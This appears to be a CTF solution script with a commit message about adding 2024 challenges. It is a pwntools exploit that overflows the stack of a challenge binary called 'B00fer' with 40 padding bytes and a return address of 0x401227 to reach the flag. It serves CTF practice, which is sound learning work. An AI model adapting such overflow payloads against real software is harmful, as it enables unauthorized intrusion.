Add CTFs from 2024 to the content, htb apocalypse, spookyCTF, buckeye ctf and some edits to the 404 ctf
#!/usr/bin/python3
from pwn import *
# Allows you to switch between local/GDB/remote from terminal
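def start(argv=None, *a, **kw):
    """Launch the target binary and return a pwntools tube for it.

    The launch mode is chosen by the pwntools command-line switches
    ``GDB``, ``REMOTE`` and ``SSH``; with none of them set the binary is
    run as a local process.

    Args:
        argv: extra command-line arguments appended after the executable.
            ``None`` means no arguments; a list is accepted as before.
        *a, **kw: forwarded unchanged to the underlying pwntools launcher.

    Returns:
        A pwntools tube: the result of ``gdb.debug``, ``remote``,
        ``ssh(...).process`` or ``process`` depending on the mode.
    """
    # Copy so the caller's list is never aliased (and no shared mutable default).
    argv = [] if argv is None else list(argv)

    if args.GDB:  # uses the module-level gdbscript defined further down
        # `exe` must be assigned here: it is a local of this function
        # (assigned on the other branches), so reading it unassigned on
        # this path raised UnboundLocalError.
        exe = local_exe
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:  # expects host and port as the two positional arguments
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    if args.SSH:
        exe = remote_exe
        # Placeholder credentials: fill in before use, and keep real values
        # out of the committed script (read them from the environment instead).
        s = ssh(host='HOST', user='LOGIN', password='PASSWORD', port=0000)
        return s.process([exe] + argv)
    # Default: run the local binary directly.
    exe = local_exe
    return process([exe] + argv, *a, **kw)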
# Specify your GDB script here for debugging
# GDB commands executed when start() is invoked with the GDB switch.
# ``{name}`` placeholders are expanded from this module's namespace, so a
# literal brace inside a GDB command has to be written as ``{{`` / ``}}``.
gdbscript = '''
'''
gdbscript = gdbscript.format(**locals())
# Set up pwntools for the correct architecture
# Binary names: the local copy is parsed below, the remote name is only
# used on the SSH launch path of start().
local_exe = 'B00fer'
remote_exe = 'REMOTE'

# Registering the ELF on context lets pwntools pick up arch, bits, os etc.
# from the file itself; checksec=False disables the checksec printout.
elf = context.binary = ELF(local_exe, checksec=False)

# Logging verbosity (error/warning/info/debug): 'error' keeps the run quiet,
# switch to 'debug' to trace every byte sent and received on the tube.
context.log_level = 'error'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# 40 bytes of padding followed by the 8-byte little-endian value 0x401227
# (presumably the address the program is made to return into -- confirm
# against the binary, the value is not derived from `elf` here).
padding = b'\x00' * 5 * 8
target = p64(0x401227)
payload = flat(padding, target)

# Keep a copy of the exact bytes sent, for offline inspection.
write("payload", payload)

io = start()

# Wait for the banner line, then send the payload.
io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)

# The first response line is read and discarded; the second one is printed.
_ = io.recvline().decode()
print(io.recvline().decode())